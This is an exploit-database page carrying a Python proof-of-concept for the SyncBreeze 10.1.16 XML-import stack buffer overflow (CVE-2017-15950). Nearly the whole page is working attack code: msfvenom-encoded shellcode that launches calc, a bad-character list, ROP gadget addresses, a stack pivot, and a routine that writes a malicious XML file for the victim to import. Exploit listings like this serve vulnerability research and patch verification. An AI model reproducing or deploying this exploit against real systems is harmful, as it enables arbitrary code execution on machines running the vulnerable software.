Exploit for SyncBreeze 10.1.16 Buffer Overflow CVE-2017-15950

Name: Exploit for SyncBreeze 10.1.16 Buffer Overflow CVE-2017-15950
Rating: 5 (258 reviews)
2021-03-29 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:162008
# Exploit Title: SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow  
# Date: 03/27/2021  
# Author: Filipe Oliveira - filipecenturiao[at]hotmail.com Rafael Machado - nnszs[at]protonmail.com  
# Vendor: https://www.syncbreeze.com/  
# Software Link: https://www.4shared.com/file/57pE4sZfiq/syncbreeze_setup_v10116.html  
# Version: SyncBreeze v10.1.16 x86  
# Tested on: Windows 10 x64 (19042.867)  
# CVE: CVE-2017-15950  
  
Usage: The exploit will generate a POC file, called xplSyncBreeze.xml. Launch the application and click on Import Command, then load the POC file.   
  
# -*- coding: utf-8 -*-  
  
import struct  
  
# badchars  
#\x00\x0a\x0d\x20\x27  
#\x81\x82\x83\x84\x85\x86\x87\x88  
#\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90  
#\x91\x92\x93\x94\x95\x96\x97\x98  
#\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0  
#\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8  
#\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0  
#\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8  
#\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0  
#\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8  
#\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0  
#\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8  
#\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0  
#\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8  
#\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0  
#\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8  
#\xF9\xFA\xFB\xFC\xFD\xFE\xFF  
  
# Shellcode payload size: 432 bytes  
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=EAX -b '\x00\x0A\x0D\x20\x27' -v shellcode -f python  
  
shellcode = b""  
shellcode += b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"  
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"  
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"  
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x69"  
shellcode += b"\x78\x4e\x62\x75\x50\x77\x70\x35\x50\x45\x30"  
shellcode += b"\x4b\x39\x59\x75\x55\x61\x39\x50\x52\x44\x4e"  
shellcode += b"\x6b\x42\x70\x50\x30\x6e\x6b\x42\x72\x54\x4c"  
shellcode += b"\x6c\x4b\x70\x52\x74\x54\x4c\x4b\x62\x52\x66"  
shellcode += b"\x48\x44\x4f\x48\x37\x61\x5a\x51\x36\x45\x61"  
shellcode += b"\x39\x6f\x6e\x4c\x75\x6c\x43\x51\x71\x6c\x65"  
shellcode += b"\x52\x56\x4c\x47\x50\x4b\x71\x38\x4f\x74\x4d"  
shellcode += b"\x37\x71\x49\x57\x38\x62\x7a\x52\x52\x72\x36"  
shellcode += b"\x37\x4c\x4b\x63\x62\x42\x30\x6c\x4b\x31\x5a"  
shellcode += b"\x57\x4c\x4c\x4b\x32\x6c\x36\x71\x31\x68\x4a"  
shellcode += b"\x43\x47\x38\x47\x71\x4a\x71\x76\x31\x6c\x4b"  
shellcode += b"\x36\x39\x67\x50\x66\x61\x58\x53\x4c\x4b\x70"  
shellcode += b"\x49\x66\x78\x59\x73\x34\x7a\x53\x79\x6e\x6b"  
shellcode += b"\x50\x34\x4c\x4b\x66\x61\x4e\x36\x55\x61\x39"  
shellcode += b"\x6f\x4c\x6c\x4a\x61\x4a\x6f\x34\x4d\x67\x71"  
shellcode += b"\x48\x47\x67\x48\x69\x70\x71\x65\x59\x66\x54"  
shellcode += b"\x43\x63\x4d\x79\x68\x75\x6b\x73\x4d\x67\x54"  
shellcode += b"\x44\x35\x79\x74\x72\x78\x4e\x6b\x53\x68\x71"  
shellcode += b"\x34\x57\x71\x5a\x73\x52\x46\x6c\x4b\x36\x6c"  
shellcode += b"\x72\x6b\x6c\x4b\x76\x38\x75\x4c\x67\x71\x68"  
shellcode += b"\x53\x6e\x6b\x57\x74\x4e\x6b\x63\x31\x78\x50"  
shellcode += b"\x6f\x79\x73\x74\x47\x54\x64\x64\x53\x6b\x31"  
shellcode += b"\x4b\x63\x51\x50\x59\x63\x6a\x43\x61\x39\x6f"  
shellcode += b"\x59\x70\x73\x6f\x31\x4f\x62\x7a\x4e\x6b\x44"  
shellcode += b"\x52\x6a\x4b\x4e\x6d\x53\x6d\x73\x5a\x63\x31"  
shellcode += b"\x4c\x4d\x4d\x55\x6f\x42\x75\x50\x47\x70\x33"  
shellcode += b"\x30\x46\x30\x50\x68\x74\x71\x6c\x4b\x42\x4f"  
shellcode += b"\x6e\x67\x39\x6f\x6e\x35\x6f\x4b\x58\x70\x78"  
shellcode += b"\x35\x79\x32\x46\x36\x33\x58\x79\x36\x4c\x55"  
shellcode += b"\x4f\x4d\x6d\x4d\x39\x6f\x6a\x75\x55\x6c\x63"  
shellcode += b"\x36\x61\x6c\x45\x5a\x6d\x50\x49\x6b\x39\x70"  
shellcode += b"\x32\x55\x75\x55\x6d\x6b\x57\x37\x64\x53\x74"  
shellcode += b"\x32\x52\x4f\x50\x6a\x53\x30\x61\x43\x59\x6f"  
shellcode += b"\x78\x55\x73\x53\x30\x61\x30\x6c\x72\x43\x43"  
shellcode += b"\x30\x41\x41"  
  
  
# padding to crash buffer  
basura = struct.pack('<L', 0x41414141) * 390  
  
# gadgets to move payload pointer into EAX  
GAD1 = struct.pack('<L', 0x65235465) # XCHG EAX,EBP  
GAD2 = struct.pack('<L', 0x6506537C) # CALL EAX  
  
# padding to reach buffer address stored in ebp  
basura2 = struct.pack('<L', 0x41414141) * 56  
  
# padding for stack pivot  
  
padding = struct.pack('<L', 0x41414141) * 4  
padding2 = struct.pack('<L', 0x41414141) * 20  
  
# stack pivot to reach an area with more space for gadgets on the stack  
# 0x6506491c: add esp, 0x48 ; pop edi ; pop esi ; ret  
  
pivot = struct.pack('<L', 0x6506491c)  
  
# final payload  
  
fruta = basura + pivot + padding + padding2 + GAD1 + GAD2 + basura2 + shellcode  
  
  
# write payload to xml file  
  
payload = open("xplSyncBreeze.xml", "wb")  
payload.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n".encode('utf-8'))  
  
payload.write("<sync name='".encode('utf-8'))  
payload.write(fruta)  
payload.write("'>\n</sync>\n".encode('utf-8'))  
  
payload.close()